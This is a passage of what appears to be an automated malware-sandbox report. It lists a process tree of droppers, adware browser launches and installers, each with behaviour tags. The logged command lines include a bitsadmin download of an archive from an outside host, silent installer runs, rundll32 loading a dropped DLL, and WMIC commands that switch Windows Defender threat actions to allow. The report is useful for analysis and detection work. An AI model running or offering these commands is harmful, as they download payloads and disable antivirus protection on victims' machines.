C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:29⤵
- Executes dropped EXE
PID:5852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:39⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3084 /prefetch:89⤵PID:7140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:19⤵PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:19⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:19⤵PID:6432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:19⤵PID:7312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:19⤵PID:7324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4268 /prefetch:89⤵PID:8064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4268 /prefetch:89⤵PID:8116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5636 /prefetch:29⤵PID:8896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:19⤵PID:9440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:19⤵PID:9608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:89⤵PID:12232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:19⤵PID:12860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:19⤵PID:13044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5936 /prefetch:89⤵PID:13176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:89⤵PID:13584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:19⤵PID:5572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:19⤵PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1744 /prefetch:89⤵PID:6288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6308 /prefetch:19⤵PID:6440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:19⤵PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:19⤵PID:8336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:19⤵PID:8408
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵PID:9348
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:9372
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵PID:12772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:12792
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵PID:7136
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:1512
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵PID:4848
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:2592
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵PID:7640
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:2256
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵PID:8040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:7936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d4-f0774-8ea-dd588-36bf64dbf255f\Lukykutufu.exe"C:\Users\Admin\AppData\Local\Temp\d4-f0774-8ea-dd588-36bf64dbf255f\Lukykutufu.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
PID:4276 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypp5nifk.gma\GcleanerEU.exe /eufive & exit8⤵PID:12756
-
C:\Users\Admin\AppData\Local\Temp\ypp5nifk.gma\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ypp5nifk.gma\GcleanerEU.exe /eufive9⤵PID:16204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16204 -s 26810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4540
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:16028
-
C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exeC:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:16248 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\s3zsbqz4.2im\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862242 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:5244
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dew2x1f.ru3\any.exe & exit8⤵PID:16132
-
C:\Users\Admin\AppData\Local\Temp\2dew2x1f.ru3\any.exeC:\Users\Admin\AppData\Local\Temp\2dew2x1f.ru3\any.exe9⤵PID:16236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rmndzvzo.0mb\gcleaner.exe /mixfive & exit8⤵PID:16304
-
C:\Users\Admin\AppData\Local\Temp\rmndzvzo.0mb\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rmndzvzo.0mb\gcleaner.exe /mixfive9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 26410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2276
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oc3klthe.nuh\autosubplayer.exe /S & exit8⤵PID:5908
-
C:\Users\Admin\AppData\Local\Temp\oc3klthe.nuh\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\oc3klthe.nuh\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:2868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:6932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:4004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2824
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:2992
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:7500
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:7700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:7904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
PID:8232
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
PID:8420
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pGbecjOO199LHnZy -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵PID:9752
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Xo1pCjtMppzo7M -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
- Drops file in Program Files directory
PID:9804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:9860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10272
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10488
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10680
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OsCELDuBOVuk\OsCELDuBOVuk.dll" OsCELDuBOVuk10⤵
- Loads dropped DLL
PID:10868 -
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OsCELDuBOVuk\OsCELDuBOVuk.dll" OsCELDuBOVuk11⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
PID:10884
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:10948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵
- Drops file in Program Files directory
PID:11284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵
- Drops file in Program Files directory
PID:11492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:11684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj221.tmp\tempfile.ps1"10⤵PID:11888
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT10⤵
- Loads dropped DLL
PID:12172
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\d6VXIVqi2MqlNOaKIT8CawaY.exe"C:\Users\Admin\Documents\d6VXIVqi2MqlNOaKIT8CawaY.exe"2⤵
- Executes dropped EXE
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\7zSFD18.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
PID:5680 -
C:\Users\Admin\AppData\Local\Temp\7zS2E1B.tmp\Install.exe.\Install.exe /S /site_id "394347"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
PID:3912 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &5⤵PID:2200
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:4424
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:6036
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:1504
-
